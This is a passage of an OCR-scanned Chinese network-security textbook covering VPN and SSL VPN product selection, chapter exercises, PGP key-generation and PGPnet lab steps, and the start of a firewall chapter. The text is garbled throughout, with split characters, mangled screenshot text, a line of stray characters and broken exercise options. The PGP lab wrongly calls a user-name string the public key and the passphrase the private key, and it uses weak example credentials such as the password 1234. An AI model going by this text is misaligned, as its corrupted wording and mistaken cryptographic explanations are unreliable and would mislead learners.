就 不 能 改变 明文 形式 了 P 头 中 的 地 址 。 而 且 ，TCP 校 验 和 与 UDP 校 验 和 不 能 被 更 新 ， 是 因 
为 它们 是 有 效 载荷 中 的 被 加 密 部 分 。 


6.3.5 ”VPN 产品 的 选择 


过 去 ， 由 于 专线 费用 太 高 ， 使 得 企业 信息 化 的 速度 无 法 快速 增长 。 由 于 信息 传递 、 运 
输 不 易 等 阻碍 ， 成 功 的 企业 只 能 在 有 限 的 区 域 范围 内 把 规模 扩大 ， 因 此 大 大 降低 了 企业 的 
竞争 力 。 现 在 ， 为 了 满足 整体 经 济 规模 持续 扩张 的 需求 ， 随 着 网 络 技术 的 大 步 迈 进 、 企 业 
VPN 级 产品 的 成 熟 发 展 ， 成 就 了 企业 可 以 将 总 部 外 的 分 支 外 点 、 办 事 处 等 点 ， 根 据 企业 市 
场 扩展 需要 ， 布 局 到 各 个 省 份 、 整 个 中 国 、 甚 至 是 世界 各 地 。 

然而 ， 当 企业 规模 转变 成 总 部 、 分 支 外 点 、 移 动 客户 等 多 点 架构 的 同时 ， 新 的 问题 又 
出 现 了 。 如 何 增强 企业 各 点 间 更 快速 、 稳 定 、 安 全 的 信息 流通 ， 如 : ERP 数据 存 取 、VoIP 
数字 电话 沟通 、E-mail 及 时 传输 等 应 用 ， 这 就 是 VPN 最 大 的 优势 与 特色 。 

在 面 对 市 场 上 众多 的 VPN 产品 ,网络 专 业 知 识 略 显 不 足 的 企业 常常 显得 很 茫然 , 不 知 
如 何 选择 适合 自己 企业 的 VPN 产品 。 若 是 任 由 系统 集成 商 推广 不 恰当 的 产品 组 合 ， 那 么 ， 
不 但 花费 了 高 额 的 费用 ， 还 达 不 到 最 佳 效果 。 如 今 大 多 数 中 小 企业 主 们 ， 在 企业 信息 化 升 
级 的 需求 下 ， 都 希望 能 够 选 购 到 真正 适合 其 企业 的 VPN 产品 和 解决 方案 。VPN 导入 评估 
表 如 图 6-10 所 示 。 


6-10 ”VPN 导入 评估 表 


1. 你 的 企业 需要 VPN 吗 


根据 各 行业 的 经 验 累积 ， 对 于 企业 信息 而 言 ， 可 以 说 企业 级 VPN 产品 应 用 主要 表现 为 
实时 信息 传递 与 高 安全 性 两 方面 。 由 于 企业 级 VPN 是 在 互联 网 上 使 用 加 密 隧道 , 将 所 有 分 
支 外 点 与 总 部 中 心 端 之 间 ， 建立 一 个 私有 且 安 全 的 多 点 互联 网 络 ， 具 有 安全 、 简 单 、 方 便 、 
省 成 本 的 特性 。 通 过 VPN 网 络 可 让 企业 各 分 支 外 点 、 移动 用 户 达 到 如 同 置 身 在 中 心 端 内 网 
的 效果 ， 达 到 远程 访问 ERP、 存 取 公 司 内 部 数据 ， 快 速 、 实 时 又 方便 。 此 外 ，VPN 另外 一 
项 特色 是 具有 加 密 的 功能 ， 因 此 企业 的 所 有 信息 通过 VPN 网 络 即 可 达到 安全 保密 的 效果 。 
整体 而 言 ， 如 果 一 个 企业 需要 让 各 地 外 点 远程 达到 实时 同步 共享 中 心 端 资源 ， 增 加 企业 对 
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外 竞争 力 ， 同 时 保证 机 密 数 据 安全 保密 ， 那 么 该 企业 就 需要 建构 适合 的 VPN 网 络 。 

通过 VPN 导入 评估 表 ， 企 业 用 户 可 以 简单 判断 是 否 需要 VPN， 或 是 进一步 了 解 适 合 
采用 何 种 VPN 协议 。 

2. 找 出 企业 最 适合 的 VPN 协议 

目前 市 面 上 企业 级 VPN 产品 有 高 、 中 、 低 三 级 产品 , 但 几乎 都 是 由 三 个 最 主要 的 协议 
所 组 成 ， 包 含 IPSec、SSL、PPTP 等 协议 类 型 。 而 要 找 出 企业 最 适合 的 VPN 产品 之 前 ， 必 
须 对 这 三 种 主要 协议 的 应 用 特性 有 所 了 解 。 

一 般 而 言 , IPSec 是 运用 在 网 关 对 网 关 的 设备 ,也 就 是 中 心 端 对 规模 较 大 的 外 点 所 采用 
的 设备 ， 同 时 也 是 目前 运用 最 普及 的 VPN 协议 。 但 在 设 定 上 ， 多 达 20 几 个 设 定 步骤 ， 对 
于 不 太 具 备 网 关 知 识 的 企业 用 户 而 言 ， 浆 端 是 略 显 繁复 ， 对 网 管 而 言 ， 也 是 一 大 门槛 。 针 
对 这 点 ， 市 场 上 已 推出 SmartLink VPN 的 IPSec 改良 技术 ， 有 效 地 简化 了 IPSec 繁复 设 定 ， 
只 需 3 个 参数 即 可 完成 联机 设 定 ， 因 此 已 不 是 太 大 的 问题 。 但 IPSec 协议 设 定 一 旦 联机 后 ， 
所 有 信息 也 跟着 开放 了 ， 每 个 人 可 使 用 的 信息 均 相 同 ， 无 法 设 定 不 同人 可 有 不 同 的 存 取 权 
限 ， 这 对 于 企业 只 想 开放 有 限 的 权限 给 合作 伙伴 的 考虑 而 言 ， 是 一 个 比较 大 的 瓶颈 。 

相对 IPSec 而 言 ，SSL 是 近年 来 在 VPN 设备 市 场 中 ， 异 军 突起 流行 的 通信 协议 。 它 除 
了 拥有 实时 分 享 与 信息 安全 两 大 基本 优势 之 外 ， 还 可 针对 不 同 的 用 户 属性 ， 设 定 不 同 的 使 
用 权限 ,比如 只 允许 合作 伙伴 使 用 FTP 服务 、 允 许 出 差 在 外 的 业务 人 员 使 用 ERP 数据 存 取 、 
允许 分 支 外 点 拥有 使 用 全 部 服务 的 权限 等 。 只 需要 标准 浏览 器 登入 中 心 端 应 用 、 存 取 内 网 
资源 ， 解 放 外 部 员工 VPN 联机 的 地 点 限制 。 对 于 VPN 产品 而 言 ，SSL VPN 的 加 入 ， 等 于 
更 加 强化 了 企业 信息 安全 的 全 面 性 。 然而 , 目前 SSL VPN 虽然 已 从 高 价 的 规格 到 中 小 企业 
可 以 接受 的 范围 ， 但 对 于 某 些 企业 来 说 ， 还 是 必须 考虑 相对 IPSec 较 高 的 建 置 成 本 ， 因 此 
若 企业 不 需要 管控 人 员 权 限 ，IPSec 倒是 不 错 的 选择 。 

至 于 PPTP 多 半 运 用 在 信息 流量 不 大 、 不 需要 实时 信息 的 小 分 点 机 构 或 移动 用 户 .PPTP 
虽然 使 用 较为 简单 ,但 在 安全 性 上 并 没有 完整 的 加 密 机 制 ， 所 以 对 于 企业 机 密 安全 考虑 上 ， 
会 有 比较 高 的 风险 存在 。 因 此 ， 在 企业 各 点 ， 包 括 小 分 点 或 是 移动 用 户 ， 我 们 还 是 建议 采 
用 SSL VPN 或 是 IPSec VPN 协议 , 在 信息 安全 性 上 会 比较 适合 。 但 IPSec VPN 在 外 点 的 运 
用 上 ， 必 须 另 外 建 置 一 台 VPN 设备 ， 对 于 只 有 单机 或 移动 用 户 而 言 ， 有 种 杀 鸡 焉 用 牛刀 之 
感 .为 了 解决 这 个 问题 ,Qno 侠 诺 公司 特别 针对 企业 单机 外 点 与 移动 用 户 推 出 QnoKey IPSec 
客户 端 密 钥 ， 使 用 一 把 U 盘 大 小 的 Key 即 可 取代 路 由 器 设备 ， 实 现 简便 、 安 全 联机 总 部 ， 
并 可 省 去 网 管 人 员 维护 设 备 的 负担 ,大 大 降低 了 VPN 联网 建 置 的 总 体 成 本 。 因 此 如 何 找 出 
最 适合 企业 的 VPN 协议 ， 必 须根 据 企 业 自身 不 同 的 需求 属性 ， 进 行 有 效 地 选择 。 


6.3.6 SSL VPN 产品 的 选择 


随 着 SSL(Secure Sockets Layer): 安全 套 接 层 协议 层 , 是 网 景 (Netscape) 公 司 提出 的 基于 
WEB 应 用 的 安全 协议 ) VPN 技术 的 发 展 ，SSL VPN 产品 所 能 提供 的 终端 网 络 功能 已 经 与 
传统 的 IPSec VPN 产品 几乎 一 样 强大 ，SSL VPN 接 入 方式 是 点 对 网 VPN 接 入 的 最 佳 选择 
的 观点 ， 也 越 来 越 深入 人 心 。 同 时 随 着 用 户 对 产品 的 要 求 越 来 越 高 ， 软 件 形式 的 VPN 已 经 
早 就 逐步 地 让 位 于 硬件 VPN 设备 。 


然而 ， 随 着 技术 与 市 场 的 不 断 成 熟 ， 越 来 越 多 的 用 户 发 现 市 场 上 涌现 出 了 众多 厂家 ， 
各 自 的 产品 质量 参差 不 齐 , 使 一 般 的 用 户 难 以 做 出 正确 的 判断 。 用 户 购买 SSL VPN 产品 的 
需求 出 发 点 各 不 相同 ， 但 归根 结 底 可 以 整合 为 一 点 : 为 外 网 移动 办 公 的 用 户 提 供 一 条 连接 
到 内 网 资源 快速 、 安 全 、 稳 定 的 通道 。 建 立 起 的 这 个 通道 能 和 否 满足 快速 、 安 全 、 稳 定 这 三 
个 基本 要 求 ， 完 全 取决 于 用 户 所 选择 的 SSL VPN 产品 。 

1. 快速 性 

VPN 的 意义 不 仅仅 是 建立 连接 就 行 了 ， 如 果 VPN 接 入 的 速度 跟 不 上 应 用 要 求 ， 造 成 
应 用 系统 频繁 超时 甚至 操作 失败 ， 又 或 者 一 个 小 文件 的 传输 就 耗费 掉 了 用 户 大 量 的 时 间 ， 
则 建立 起 的 VPN 连接 就 没有 意义 了 。 所 以 用 户 对 速度 性 的 要 求 是 首当其冲 的 。SSL VPN 
的 接 入 速度 很 大 程度 依赖 于 两 方面 的 环境 : @ 设 备 部 署 地 的 网 络 接 入 状况 ; @@ 移 动用 户 接 
入 处 的 网 络 状况 。 设 备 部 署 地 的 网 络 接 入 状况 是 用 户 可 控制 的 ， 现 在 改善 用 户 网 络 接 入 环 
境 的 方式 主要 为 使 用 多 家 运营 商 的 线路 , 这 就 决定 了 SSL VPN 产品 必须 要 支持 多 条 网 络 线 
路 复 用 的 功能 ， 最 好 支持 接 入 用 户 的 智能 选 路 ， 从 而 使 接 入 用 户 选 择 最 快 线路 接 入 ， 少 走 
冤枉 路 。 但 移动 用 户 接 入 的 网 络 状况 则 是 不 可 控 的 ， 即使 设备 部 署 地 的 网 络 出 口 状况 再 好 ， 
那 也 不 可 能 达到 预期 的 接 入 速度 体验 。 事实 上， 如何 来 克服 移动 接 入 处 网 络 状 况 差 的 问题 ， 
从 一 开始 就 是 业内 最 大 的 难题 。 所 以 选用 的 SSL VPN 产品 ， 必 须 能 通过 自身 的 技术 优势 对 
各 种 各 样 的 用 户 接 入 环境 进行 优化 ， 如 利用 全 流量 数据 的 压缩 技术 ， 以 达到 同等 网 络 带宽 
下 传输 更 多 数据 ， 针 对 跨 运 营 商 丢 包 比较 严重 的 网 络 进行 协议 优化 的 技术 等 ， 通 过 这 些 手 
段 最 终 实现 在 同等 网 络 情况 下 获得 更 快 的 VPN 访问 速度 。 在 这 方面 , 建议 客户 在 测试 的 时 
候 可 以 针对 跨 运营 商 的 网 络 情况 进行 测试 ， 例 如 电信 线路 到 网 通 线路 ， 这 样 保障 了 对 用 户 
接 入 环境 的 最 大 兼容 性 。 

2. 安全 性 

用 户 接 入 内 网 的 目的 是 访问 内 网 资源 ， 内 网 资源 中 不 乏 各 单位 内 部 机 密 ， 如 果 这 些 内 
部 机 密 被 第 三 方 截取 并 破解 ， 其 后 果 不 堪 设 想 。 因 此 一 款 好 的 SSL VPN 产品 应 该 是 真正 基 
于 工业 标准 SSL 协议 的 ， 至 少 拥有 DES、3DES、AES、MD5、RC4、RSA 等 基本 算法 
并 且 随 着 国家 信息 安全 建设 步伐 的 加 快 ， 政 府 、 教 育 、 电 力 等 大 型 行业 用 户 选择 支持 国 密 
办 加 密 算法 SSL VPN 产品 无 疑 是 最 保险 的 选择 , 这 样 避免 了 国家 强制 要 求 出 台 后 全 线 产品 
必须 更 换 ， 从 而 造成 大 量 IT 投入 浪费 的 风险 。 

但 这 仅仅 保证 的 是 数据 通道 传输 的 安全 , 一 款 好 的 SSL VPN 产品 还 应 该 关注 用 户 端 接 
入 安全 、 接 入 后 权限 控制 这 两 方面 问题 ， 因 为 普通 的 内 网 安全 防护 设备 并 不 能 对 SSL VPN 
方式 接 进 内 网 的 人 员 提 供 病 毒 安全 防护 ， 所 以 通过 客户 端 安全 检查 、VPN 专线 等 方式 ， 确 
保 建立 起 的 SSL VPN 通道 不 变 成 病毒 、 木 马 专用 通道 是 SSL VPN 产品 必须 保证 的 。 同 时 ， 
对 接 入 人 员 的 身份 认证 也 是 安全 性 的 一 个 考察 点 ,在 提供 了 基本 的 认证 方式 如 用 户 名 \ 密 码 
认证 、 短 信 认 证 、USBKEY 认证 、 动 态 令 牌 认 证 、 硬 件 特征 码 认证 等 方式 后 ， 与 客户 网 络 
内 部 已 有 的 第 三 方 服务 器 认证 、 域 认证 或 者 CA 认证 能 无 颖 结合 进行 身份 认证 ， 也 逐渐 成 
为 了 SSL VPN 认证 体系 评价 的 标准 之 一 。 而 对 于 接 入 人 员 细 致 的 权限 控制 也 是 SSL VPN 
产品 必 备 的 特性 之 一 ， 如 果 一 个 普通 权限 员工 接 入 内 网 后 可 以 随意 访问 财务 服务 器 ， 这 肯 
定 是 存在 安全 隐患 的 ， 一 般 现 有 的 权限 控制 都 基于 角色 和 资源 的 关联 ， 并 搭配 以 用 户 门户 
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之 类 的 技术 来 实现 。 
3. 稳定 性 


随 着 信息 化 程度 的 提高 ， 越 来 越 多 的 单位 具体 业务 与 SSL VPN 进行 了 结合 ,SSL VPN 
线路 的 稳定 性 是 这 类 用 户 最 关注 的 问题 。 由 于 线路 故障 、 设 备 故障 等 原因 引起 的 SSL VPN 
线路 长 时 间 中 断 的 情况 都 是 不 允许 出 现 的。 因此 ， 一 款 SSL VPN 产品 在 稳定 性 方面 的 技术 
保障 必 不 可 少 。 

4. 其 他 方面 


(1) 性 能 方面 。 

不 盲目 追求 高 性 能 ， 选 择 合适 应 用 规模 的 SSL VPN 设备 。 

(2) 性 价 比 。 

只 买 最 好 ， 不 买 最 贵 ， 同 等 价格 获得 越 多 的 功能 和 性 能 ， 是 所 有 采购 行为 追求 的 目标 。 
并 且 性 价 比 很 多 时 候 还 体现 在 后 续 的 平滑 升级 方面 ， 基 于 已 有 的 高 端 设备 搭配 一 个 较 低 端 
的 设备 集群 混合 使 用 ， 则 是 一 种 比较 容易 让 用 户 接受 的 升级 方式 。 

(3) 技术 支持 及 售后 服务 。 

如 果 没 有 良好 的 技术 支持 及 售后 服务 来 做 支撑 ， 其 产品 的 使 用 效果 会 大 打折 扣 。 

(4) 产品 市 场地 位 的 考察 。 

在 判断 产品 市 场地 位 方面 ， 业 内 的 口碑 以 及 第 三 方 市 场 调查 机 构 的 客观 调查 报告 则 是 
最 值得 参考 的 两 点 。 

(5) 总 结 。 

如 何 选 购 最 适合 企业 的 VPN 产品 , 除了 应 该 了 解 本 身 企业 架构 的 商业 特性 之 外 ,还 必 
须 针 对 整体 网 络 环境 有 所 了 解 ， 才 不 致 错 买 了 不 适用 的 VPN 产品 ， 既 没 达到 VPN 的 功效 ， 
又 白白 浪费 了 金钱 。 


小 结 


本 章 主要 介绍 了 加 密 技 术 和 几 种 常用 加 密 算 法 的 基础 知识 。 对 电子 商务 中 用 到 的 数字 
签名 和 公 钥 技术 设施 也 做 了 介绍 。 最 后 简要 阐述 了 VPN 相关 技术 知识 。 


本 章 习 题 
一 、 填 空 题 
1. ”加密 技术 可 分 为 和 两 种 。 
2. 非 对 称 加 密 技术 也 叫做 技术 。 
3. 对称 密 钥 算 法 中 ， 和 的 双方 使 用 的 是 相同 的 密 钥 。 
4. ”PKI 是 的 缩写 。 
5. VPN 是 指 


二 、 选 择 题 
1. 密码 学 中 ， 发 送 方 要 发 送 的 消息 称 为 ( “)。 

A. 原文 本 : 帘 交 C. 明文 D. 数据 
2. 非法 接收 者 试图 从 密 文 分 析出 明文 的 过 程 称 为 (。 )。 

A. 破 译 B. 解密 C. 读 取 D. 翻译 
3. ”下列 ( ””) 加 密 技术 不 是 对 称 加 密 技 术 。 

A. IDEA B. RC5 C.DES D. RSA 
4. ”下列 选项 中 ，( ”) 不 是 电子 商务 采用 的 主要 安全 技术 。 

A. 加 密 技术 B. 数字 签名 C. SET D. DNS 


三 、 综 合 题 

简 述 加 密 技术 在 实际 生活 中 的 应 用 。 

简 述 对 称 加 密 算法 和 非 对 称 加 密 技术 的 相同 点 和 不 同 点 。 
简 述 PKI 的 基本 特点 。 

什么 是 公 钥 密码 算法 ? 公 铀 是 将 密 钥 完 全 公开 吗 ? 

简 述 在 RSA 算法 中 加 密 密 钥 和 解密 密 钥 产 生 的 过 程 。 
我 国有 没有 必要 开展 密码 学 的 研究 ? 

选择 SSL VPN 产品 需要 从 哪 几 个 方面 综合 考虑 ? 


实 训 一 ”PGP 加 密 程序 应 用 


pe 


PGP(Pretty Good Privacy) 加 密 软件 是 美国 Network Associate Inc. 出 产 的 免费 软件 ,可 用 
它 对 文件 、 邮 件 进行 加 密 ， 在 常用 的 WinZIP、word、ARJ、Excel 等 软件 的 加 密 功 能 均 可 
被 破解 时 ， 选 择 PGP 对 自己 的 私人 文件 、 邮 件 进 行 加 密 不 失 为 一 个 好 办 法 。 除 此 之 外 ， 你 
还 可 以 和 同样 装 有 PGP 软件 的 朋友 互相 传递 加 密 文件 ， 安 全 十 分 有 保障 。 

1. 实验 目的 

本 实验 采用 PGP 8.0.2 版 本 为 例 ， 介 绍 PGP 软件 的 使 用 ， 包 括 PGP 软件 的 安装 与 初始 
设置 ， 使 用 PGP 软件 加 密 和 解密 文件 。 

2. 实验 内 容 

1) ”安装 

PGP 的 安装 很 简单 ， 和 平时 的 软件 安装 一 样 ， 只 需 按 提示 一 步 步 “Next” 完 成 即 可 。 

2) ”生成 密 钥 

使 用 PGP 之前， 首先 需要 生成 一 对 密 钥 ,这 一 对 密 钥 是 同时 生成 的 ， 其 中 的 一 个 称 为 
公 钥 , 意思 是 公共 的 密 钥 ,你 可 以 把 它 分 发 给 你 的 朋友 们 ， 让 他 们 用 这 个 密 钥 来 加 密 文 件 ; 
另 一 个 我 们 称 为 私 钥 ， 这 个 密 钥 由 你 保存 ， 你 是 用 这 个 密 钥 来 解 开 加 密 文件 的 。 打 开 “ 开 
始 ” 中 “PGP” 的 “PGP KEYS”, 可 看 到 如 图 6-11 所 示 的 画面 。 单 击 图 标 或 者 用 菜单 “keys” 
一 “new keys” 开 始 生成 密 钥 。PGP 有 一 个 很 好 的 密 钥 生成 向 导 ， 只 要 跟着 它 一步 一 步 做 


@ 
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下 去 就 可 以 生成 密 钥 生 成 
(1) 单 击 “ 开 始 ” 一 “程序 ”一 PGP 一 PGPKeys， 出 现 如 图 6-11 所 示 PGP 软件 界面 。 


(2) 单 击 Keys 一 New keys。 
图 6-12 中 提示 这 个 向 导 的 目的 是 
进行 签名 。 单 击 “ 下 一 步 ” 按 钮 。 
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过 程 : 


it Vier Beys Server Growps 了 el 


| 


Keys Ve Trast Sire seription 
日 蜡 siizaeyeanaz009 Clinyn .. 图 ”523 2046/1024 re ir 


6-11 PGP 软件 界面 图 


出 现 如 图 6-12 所 示 的 提示 对 话 框 。 
生成 一 对 密 钥 , 你 可 以 用 它 来 加 密 文件 或 对 数字 文件 


Welcome to the PGP Key 

Generation Wizard 

In order for other people to send you secure messages. 

you must frst generate a key pail 

Your key pai wil also be used to sign digital documents: 
ee Wi ee ee 


Key.” The public key should 
人 和 si 


Ifyou would 了 ke more on what akey pair is 
a en Me 


Oltherwise, choose Next to continue. 有 NDS 
detailed contr 


cick Expert below to have more， 


图 6-12 提示 向 导 图 


(3) PGP 会 要 求 你 输入 全 名 和 邮件 地 址 。 虽 然 真 实 的 姓名 不 是 必须 的 ， 但 是 输入 一 个 
你 的 朋友 看 得 懂 的 名 字 会 使 他 们 在 加 密 时 很 快 找到 想 要 的 密 钥 。 本 例 中 我 们 输入 
xinxigongchengxi 和 liuyanx009@126.com。 字 符 串 xinxigongchengxi 就 是 公 钥 。 输 入 完成 后 
单 击 “ 下 一 步 ” 按 钮 。 出 现 如 图 6-13 所 示 界 面 。 

(4) 在 该 对 话 框 中 需要 两 次 输入 密码 。 该 密码 就 是 我 们 自己 的 私人 密 钥 ， 密 码 最 好 大 
于 8 位， 并 且 最 好 包括 大 小 写 、 空 格 、 数 字 、 标 点 符号 
密码 。 边 上 的 “Hide Typing” 指 示 是 否 显示 键入 的 密码 。 本 例 中 我 们 使 用 私人 密 钥 
1235711131719232931， 是 从 1 到 31 的 质数 排列 。 接 下 来 PGP 会 花 一 点 时 间 来 生成 我 们 的 


密 钥 。 如 图 6-14、 图 6-15、 图 6-16 所 示 。 


等 ， 最 妙 的 是 PGP 支持 用 中 文 作为 
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PG6P Key Generation Wizard 


Name and Email Assignment 
Every key pai must have a name associated witht The name and emall address let 
your comespondenls know that the public key they are using belongs to you 


me inxigongchengxi 


By associating an email address with your key pai. you will enable PGP to assist your 
comespondents in selecting the comect public key when communicating with you 


Email address: |liuyanx0098126. com 
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图 6-13 ”在 提示 向 导 图 中 输入 邮箱 和 公 钥 


POP Key Generation Wizard 


Passphrase Assignment 
Your private key wil be protected by a passphrase. Itis mportant thatyou keep this 
passphrase sectet and do not we k down 


Your passphrase should be at least 8 characters long and should contain 
norralphabetic characters. 


Hide Typing 


图 6-14 生成 密 钥 过 程 


PGP Key Generation Wizard 


Key Generation Progress 
Key generation can involve multiple steps. Some of these steps may require several 
minules to complete 
Key generation steps: 
v GeneraingKey 
v Generating Subkey 


Curent status: Done 


Dverall progress: 
[EECCD] 


图 6-15 密 钥 生成 


( 
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PCP Key Generation Wizard 


Completing the PGP Key 
Generation Wizard 


You have successiuly generaled a PGP key pai 
You wil now be able to receive secure messages and 
son documents. 


Ifyou wish to send your new public key to a keyserver 
Sph ght oick on tin PEPheys, ond use the Sord to 
menu 


Cick Finish to close this Wizard and add your new key 
pa to your keying 
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图 6-16 生成 密 钥 过 程 全 部 完成 
最 后 出 现 图 6-17 所 示 对 话 框 。 


Description 
Sa 2048/1024 DN/DSS key psir 


1 key(s) selected 


6-17 ”查看 密 钥 属性 


把 公用 密 钥 发 给 我 们 的 朋友 。 用 快捷 键 Ctrl+E 或 者 菜单 keys 一 Emport 将 我 们 的 密 钥 
导出 为 扩展 名 为 asc 或 txt 的 文件 ,将 它 发 给 我 们 的 朋友 们 (对 方 则 用 Ctrl+M 或 keys 一 import 
导入 )。 

3) ”加 密 解 密 操 作 

(1) 对 文件 加 密 : 本 例 中 我 们 单 击 某 个 文件 夹 中 一 个 PPT 文件 进行 加 密 。 选中 该 文件 ， 
单 击 右键 选择 PGP 的 Encrypt， 会 弹出 一 个 对 话 框 让 我 们 选择 要 用 的 密 钥 ， 双 击 使 它 加 到 
下 面 的 Recipients 框 中 即 可 。 如 图 6-18 所 示 。 

单 击 “OK” 按 钮 ， 加 密 文 件 生成 。 比 较 加 密 前 后 的 图 标 ， 如 图 6-19(a) 为 加 密 前 文件 
的 图 标 、 图 6-19(b) 为 加 密 后 文件 的 图 标 所 示 。 

在 图 6-20 下 方 的 文本 框 中 输入 我 们 的 私人 密 钥 : 1235711131719232931。 单 击 “OK”， 
会 出 现 “Enter output filename” 对 话 框 ， 提 示 我 们 选择 解密 后 的 文件 要 存放 的 位 置 。 解 密 
文件 完成 。 
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(a) (b) 
图 6-19 ”比较 加 密 前 后 文件 的 图 标 
(2) 解密 : 选择 要 解密 的 文件 ， 右 击 ， 选 择 “ 打 开 ”， 出 现 如 图 6-20 所 示 对 话 框 。 


Message was enctypted to the folowing public key(s): 
inxigongchengxi Qiuyanx0098126. com> DH/2048) 


Enter passphtase for your private key : 


图 6-20 输入 解密 文件 使 用 的 密 钥 
实 训 二 ”使 用 PGP 实现 VPN 的 实施 


1. 实验 目的 


PGP 是 一 种 供 大 众 使 用 的 加 密 软 件 。 电 子 邮 件 通 过 开放 的 网 络 传输 ， 网 络 上 的 其 他 人 
都 可 以 监听 或 者 截取 邮件 , 来 获得 邮件 的 内 容 , 因而 邮件 的 安全 问题 就 比较 突出 了 。 PGP 能 
够 提供 独立 计算 机 上 的 信息 保护 功能 ， 获 得 一 个 比较 完备 的 保密 系统 。 它 使 用 加 密 以 及 校 
验 的 方式 ， 提 供 了 多 种 功能 和 工具 ， 帮 助 您 保证 您 的 电子 邮件 、 文 件 、 磁 盘 、 以 及 网 络 通 
信 的 安全 。 本 节 使 用 PGP 软件 实现 VPN 的 实施 。 
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2. 实验 准备 

在 实验 用 的 两 台 计 算 机 上 安装 有 PGP 软件 。 

3. 实验 过 程 

(1) 记录 下 合作 伙伴 的 计算 机 名 和 了 他 地址。 

(2) 单 击 开始 > 程序 >PGP>PGPnet。 

(3) 仔细 阅读 Add Host Wizard 的 提示 内 容 ， 单 击 Next 按钮 。 

(4) 接受 默认 设置 ， 单 击 Next 按钮 。 

(5) 选择 默认 项 Enforce secure communications， 然 后 单 击 Next 按钮 。 

(6) 输入 启示 下 的 计算 机 名 后 单 击 Next 按钮 。 

(7) 输入 合作 伙伴 的 计算 机 名 或 他 地址 ， 单 击 Next 按钮 。 

(8) 选择 Use public-key cryptographic security only 单 选 框 ， 然 后 单 击 Next 按钮 。 

(9) 接 下 来 选择 Automatically 选项 ， 然 后 单 击 Next 按钮 。 

(10) 单 击 Select Key 按钮 以 选择 自己 的 密 钥 。 

(11) 选中 显示 自己 的 公 钥 ， 单 击 OK 按钮 。 

(12) 单 击 Next 以 完成 该 过 程 。 

(13) 然后 将 被 要 求 输入 自己 的 私 钥 的 Passphrase， 创 建 一 个 系统 的 认证 条 目 。 

(14) 双方 同时 打开 User Manager， 创 建新 用 户 ciw, 清除 User Must Change Password at 
Next Logon 选项 ， 以 1234 为 密码 。 

(15) 打开 PGPnet， 单 击 Add 按钮 。 

(16) 根据 向 导 提 示 ， 在 列表 中 输入 合作 伙伴 的 下 地 址 。 

(17) PGPnet 配置 窗口 中 ， 选 择 Hosts 页 ， 查 看 是 否 存在 刚 建立 的 条 目 。 

(18) 建立 到 合作 伙伴 的 FTP 连接 ， 使 用 ciw 用 户 名 ; 同时 ， 提 示 合 作 伙伴 进行 相同 的 
操作 。 

(19) 观察 SA 批示 灯 将 变 为 绿色 。 

(20) 用 相反 的 规则 重复 上 述 各 步 。 


潼 洲 当 粮 壮 车 潍 R 侣 时 出 到 招 于 


第 7 章 防 火 墙 


【本 章 要 点 】 
通过 本 章 的 学 习 ， 可 以 了 解 防火 墙 的 基本 概念 和 防火 墙 的 功能 ， 掌 握 防 火 墙 的 规则 ; 
掌握 防火 墙 的 分 类 方法 和 体系 结构 的 相关 知识 ; 掌握 防火 墙 的 应 用 方法 。 


7.1 防火 墙 概述 
7.1.1 防火 墙 的 基本 概念 


所 谓 “ 防 火 墙 ”， 是 指 一 种 将 内 部 网 和 公众 访问 网 (如 Intemet) 分 开 的 方法 ， 它 实际 上 
是 一 种 隔离 技术 。 防 火 墙 是 在 两 个 网 络 通信 时 执行 的 一 种 访问 控制 尺度 ， 它 能 允许 你 “ 同 
意 ” 的 人 和 数据 进入 你 的 网 络 ， 同 时 将 你 “不 同意 ”的 人 和 数据 拒 之 门 外 ， 最 大 限度 地 阻 
止 网 络 中 的 黑客 来 访问 你 的 网 络 。 换 句 话说， 如 果 不 通 过 防火 墙 ， 公 司 内 部 的 人 就 无 法 访 
问 Intermet，Internet 上 的 人 也 无 法 和 公司 内 部 的 人 进行 通信 。 

防火 墙 指 的 是 一 个 由 软件 和 硬件 设备 组 合 而 成 、 在 内 部 网 和 外 部 网 之 间 、 专 用 网 与 公 
共 网 之 间 的 界面 上 构造 的 保护 屏障 。 是 一 种 获取 安全 性 方法 的 形象 说 法 ， 它 是 一 种 计算 机 
硬件 和 软件 的 结合 ， 使 Internet 与 Intranet 之 间 建 立 起 一 个 安全 网 关 (Security Gateway)， 从 
而 保护 内 部 网 免 受 非法 用 户 的 侵入 。 防 火 墙 主要 由 服务 访问 规则 、 验 证 工具 、 包 过 滤 和 应 
用 网 关 4 个 部 分 组 成 。 

下 面 介 绍 有 关 防 火 墙 的 一 些 基 本 术语 ， 理 解 和 记 住 这 些 术语 对 下 面 的 学 习 是 很 有 帮 
助 的 。 

1) ”防火 墙 (firewall) 

在 被 保护 网 络 和 因特网 之 间 ， 或 在 其 他 网 络 之 间 限 制 访问 的 一 种 或 一 系列 部 件 。 

2) ”主机 (host) 

连接 到 网 络 上 的 计算 机 系统 ， 它 可 以 是 各 种 类 型 的 机 器 ， 如 PC 或 IBM 主机 等 。 它 可 
以 运行 不 同 操作 系统 ， 如 Windows NT 等 。 

3) “堡垒 主机 (bastion host) 

它 是 一 种 被 强化 的 可 以 防御 进攻 的 计算 机 ， 被 暴露 于 因特网 之 上 ， 作 为 进入 内 部 网 络 
的 一 个 检查 点 。 通 常情 况 下 堡垒 主机 上 运行 一 些 通用 的 操作 系统 。 

4) ” 双 宿 主 主机 (dwal homed host) 

有 两 个 网 络 接口 的 计算 机 系统 。 

5) ”数据 包 过 滤 (package filtering) 

一 些 设备 ， 如 路 由 器 、 网 桥 或 单独 的 主机 ， 可 以 有 选择 地 控制 网 络 上 来 往 的 数据 流 。 
当 数 据 包 要 经 过 这 些 设备 时 ， 这 些 设备 可 以 检查 数据 包 的 相应 位 ， 根 据 既 定 的 原则 来 决定 
是 否 允 许 数 据 包 通 过 ， 有 时 这 也 被 称 作 屏 项 。 
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6) ”屏蔽 路 由 器 (screened router) 

一 种 可 以 根据 过 滤 原 则 对 数据 包 进 行 阻塞 和 转发 的 路 由 器 。 

7) “屏蔽 主机 (screened host) 

被 放置 到 屏蔽 路 由 器 后 面 的 网 络 上 的 主机 ， 主 机 能 被 访问 的 程度 取决 于 路 由 器 的 屏蔽 
规则 。 

8) ”屏蔽 子 网 (screened subnet) 

位 于 屏蔽 路 由 器 后 面 的 子 网 ， 子 网 能 被 访问 的 程度 取决 于 屏蔽 规则 。 

9) ”代理 服务 器 (proxy server) 

一 种 代表 客户 和 真正 服务 器 通信 的 程序 。 典 型 的 代理 接受 用 户 的 客户 请 求 ， 然 后 决定 
